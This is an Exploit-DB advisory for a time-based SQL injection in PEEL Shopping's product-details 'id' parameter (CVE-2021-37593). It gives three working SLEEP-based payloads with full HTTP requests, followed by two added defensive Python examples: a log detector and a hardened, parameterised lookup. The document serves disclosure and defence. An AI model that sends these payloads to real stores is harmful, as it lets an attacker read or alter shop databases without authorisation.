PEEL Shopping 9.3.0 – ‘id’ Time-based SQL Injection

  • Author: faisalfs10x
    Date: 2021-07-19
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/50142/
  • # Exploit Title: PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection
    # Date: 2021-07-10
    # Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
    # Vendor Homepage: https://www.peel.fr
    # Software Link: https://sourceforge.net/projects/peel-shopping/files/peel-shopping_9_3_0.zip/download
    # Version: prior to 9.4.0
    # Tested on: Windows 10, XAMPP
    # Reference: https://github.com/advisto/peel-shopping/issues/3
    # CVE: CVE-2021-37593
    
    
    ################
    # Description#
    ################
    
    # PEEL Shopping is an eCommerce shopping cart application in PHP / MySQL which works on any hosting. A public user/guest (unauthenticated) can inject a malicious SQL query to alter the execution of predefined SQL commands via the "id" parameter of the "/peel-shopping_9_4_0/achat/produit_details.php?id=[SQLi]" endpoint. Upon a successful SQL injection attack, an attacker can read sensitive data from the database or modify database data.
    
    
    #####################
    # PoC of detection#
    #####################
    
    1) Assumed the out-of-the-box peel-shopping_9_4_0 installation uses the database name peel. This query checks whether database() is LIKE hex(%peel%): it delays for 7 seconds before redirecting to the homepage (http://localhost/peel-shopping_9_4_0/), which indicates a TRUE SQL condition, meaning the database name is like "peel".
    
    PoC #1) param id - time-based SQLi
    Payload: (SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX)
    Request: The response duration = 418 bytes | 7,719 millis
    ========
    
    GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX) HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost/peel-shopping_9_4_0/
    DNT: 1
    Connection: close
    Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000
    Upgrade-Insecure-Requests: 1
    Sec-GPC: 1
    Cache-Control: max-age=0
    
    ---
    
    2) Assumed the site is using a MariaDB database server: check whether the DB version is LIKE hex(%MariaDB%); it delays for 5 seconds if TRUE.
    
    PoC #2) param id - time-based SQLi
    Payload: (SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX)
    Request: The response duration = 418 bytes | 5,112 millis
    ========
    
    GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(5-(IF(VERSION()+LIKE+0x254d61726961444225,0,5)))))FSXX) HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost/peel-shopping_9_4_0/
    DNT: 1
    Connection: close
    Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000
    Upgrade-Insecure-Requests: 1
    Sec-GPC: 1
    Cache-Control: max-age=0
    
    ---
    
    3) By default, the database has a table named peel_produits. This query checks whether the table peel_produits exists: it delays for 10 seconds if TRUE, else redirects to the homepage instantly.
    
    PoC #3) param id - time-based SQLi
    Payload: (SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX)
    Request: The response duration = 418 bytes | 10,140 millis
    ========
    
    GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX) HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost/peel-shopping_9_4_0/
    DNT: 1
    Connection: close
    Cookie: OCSESSID=3b7c67760a18581016f7c4f5fb; language=en-gb; currency=USD; sid7cc7e9c2=07dnj7pgglunl1ei5r3ikeno5inu1gsc; last_views=a%3A1%3A%7Bi%3A0%3Bi%3A15%3B%7D; __atuvc=1%7C28; __atuvs=60eaece0c300734f000
    Upgrade-Insecure-Requests: 1
    Sec-GPC: 1
    Cache-Control: max-age=0
    
    ---
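The three probes above share a recognisable shape in web-server logs: a non-integer `id` on produit_details.php, a `SLEEP(`/`IF(` wrapper, a hex-encoded comparison string, and a response time of several seconds. The following detector is an added example for this advisory, not part of the original PoC; the Apache "combined" log lines and the assumed trailing response-time field (microseconds) are constructed to mirror PoC #1 and PoC #3, and the path suffix and threshold are assumptions for the demonstration.

```python
"""Flag time-based SQL injection attempts against produit_details.php in
web-server access logs. Added example for this advisory, not part of the
original PoC; log lines and the trailing response-time field are constructed."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache "combined" log lines plus an assumed trailing %D field
# (response time in microseconds): one legitimate product lookup and two
# requests shaped like PoC #1 and PoC #3 from the advisory.
SAMPLE_LOG = """\
127.0.0.1 - - [10/Jul/2021:10:00:01 +0000] "GET /peel-shopping_9_4_0/achat/produit_details.php?id=15 HTTP/1.1" 200 418 "-" "Mozilla/5.0" 12034
127.0.0.1 - - [10/Jul/2021:10:00:09 +0000] "GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(7-(IF(DATABASE()+LIKE+0x257065656c25,0,5)))))FSXX) HTTP/1.1" 302 418 "-" "Mozilla/5.0" 7719000
127.0.0.1 - - [10/Jul/2021:10:00:20 +0000] "GET /peel-shopping_9_4_0/achat/produit_details.php?id=(SELECT+1337+FROM+(SELECT(SLEEP(10-(IF(EXISTS(SELECT+3+FROM+peel.peel_produits),0,5)))))FSXX) HTTP/1.1" 302 418 "-" "Mozilla/5.0" 10140000
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" (?P<us>\d+)$'
)

# MySQL/MariaDB time-based primitives and the wrapper constructs used in the PoC
INDICATORS = {
    "sleep": re.compile(r"\bSLEEP\s*\(", re.I),
    "benchmark": re.compile(r"\bBENCHMARK\s*\(", re.I),
    "conditional": re.compile(r"\bIF\s*\(", re.I),
    "subselect": re.compile(r"\bSELECT\b", re.I),
    "hex_literal": re.compile(r"\b0x[0-9a-f]{2,}\b", re.I),
}
SLOW_THRESHOLD_US = 3_000_000  # assumed: 3 s is far above a normal product-page render


def decode_hex_literals(s):
    """Translate 0x... literals to ASCII so the analyst sees what the payload
    compares against (e.g. 0x257065656c25 -> %peel%)."""
    out = []
    for h in re.findall(r"0x([0-9a-fA-F]{2,})", s):
        try:
            out.append(bytes.fromhex(h).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            out.append("<non-ascii>")
    return out


def analyse_line(line):
    """Return a finding dict for a produit_details.php request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not url.path.endswith("/achat/produit_details.php"):
        return None
    ids = parse_qs(url.query, keep_blank_values=True).get("id", [""])
    raw = ids[0]  # parse_qs already URL-decodes ('+' -> space, %xx -> byte)
    numeric = re.fullmatch(r"\d+", raw) is not None
    hits = [name for name, rx in INDICATORS.items() if rx.search(raw)]
    us = int(m.group("us"))
    slow = us >= SLOW_THRESHOLD_US
    # The endpoint expects an integer id, so any non-integer value is misuse;
    # timing primitives or a slow response raise it to a likely time-based probe.
    confidence = "none" if numeric else ("high" if (hits or slow) else "low")
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "id": raw,
        "numeric": numeric,
        "indicators": hits,
        "hex_decoded": decode_hex_literals(raw),
        "response_us": us,
        "slow": slow,
        "suspicious": not numeric,
        "confidence": confidence,
    }


def scan_log(text):
    """Analyse every line and keep only produit_details.php requests."""
    return [f for f in (analyse_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        if f["suspicious"]:
            print(f"{f['ts']} {f['ip']} confidence={f['confidence']} "
                  f"indicators={f['indicators']} hex={f['hex_decoded']} "
                  f"response={f['response_us'] / 1e6:.1f}s")
```

The decoded hex literal is the most useful field for triage: it turns `0x257065656c25` into `%peel%` and shows which name or version the probe was testing for, which is exactly the information the advisory's three PoCs enumerate.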
    
    # For more explanation, refer to the GitHub issue on peel-shopping: https://github.com/advisto/peel-shopping/issues/3.
    # The affected versions are prior to 9.4.0. The issue is now fixed in version 9.4.0.1.
    # The vendor has released the latest patched version, 9.4.0.1, which is available for download from sourceforge.net: https://sourceforge.net/projects/peel-shopping/files/peel-shopping_9_4_0_1.zip/download
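The root cause described above is an `id` parameter spliced directly into SQL text. The following is an added example showing the class of fix that closes it, not the vendor's 9.4.0.1 patch and not PEEL Shopping's own PHP/MySQL code: the raw parameter is validated as a plain positive integer and then bound as a query parameter, so the advisory's payload is rejected before any SQL is built. An in-memory sqlite3 table named like the advisory's `peel_produits` stands in for the MySQL schema; the column name `nom` and the sample rows are assumptions.

```python
"""Strict integer handling for a product id: vulnerable builder beside the
hardened lookup. Added example for this advisory, not PEEL Shopping's code;
sqlite3 (in-memory) stands in for MySQL and the schema/rows are constructed."""
import re
import sqlite3

# Payload from PoC #1 as it arrives after URL decoding ('+' -> space)
POC_ID = "(SELECT 1337 FROM (SELECT(SLEEP(7-(IF(DATABASE() LIKE 0x257065656c25,0,5)))))FSXX)"

# Plain positive decimal integer: no sign, no spaces, no unicode digits
# (str.isdigit() would accept them), bounded to avoid absurd lengths.
PRODUCT_ID_RE = re.compile(r"[1-9][0-9]{0,9}")


def build_query_unsafe(product_id):
    """Vulnerable pattern (the bug class the advisory describes): the
    untrusted value becomes part of the SQL text, so SLEEP()/IF() execute."""
    return "SELECT id, nom FROM peel_produits WHERE id=" + product_id


def parse_product_id(raw):
    """Reject anything that is not a plain positive integer before SQL exists."""
    if not isinstance(raw, str) or PRODUCT_ID_RE.fullmatch(raw) is None:
        raise ValueError("invalid product id")
    return int(raw)


def lookup_product(conn, raw_id):
    """Hardened lookup: validated integer bound via a placeholder, never
    interpolated into the statement."""
    pid = parse_product_id(raw_id)
    return conn.execute(
        "SELECT id, nom FROM peel_produits WHERE id=?", (pid,)
    ).fetchone()


def rejected(raw_id):
    """True when the validator refuses the value (no query is built)."""
    try:
        parse_product_id(raw_id)
        return False
    except ValueError:
        return True


def make_demo_db():
    """Constructed stand-in for the peel_produits table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE peel_produits (id INTEGER PRIMARY KEY, nom TEXT)")
    conn.executemany("INSERT INTO peel_produits VALUES (?, ?)",
                     [(15, "Sample product"), (16, "Other product")])
    return conn


if __name__ == "__main__":
    conn = make_demo_db()
    print("unsafe SQL text:", build_query_unsafe(POC_ID))
    print("hardened, id=15:", lookup_product(conn, "15"))
    print("hardened, PoC payload rejected:", rejected(POC_ID))
```

Validation alone (casting to int) would already stop this particular payload, but binding the value as a parameter is what keeps the fix robust when the same lookup is later reused with a string-typed column; the two measures belong together.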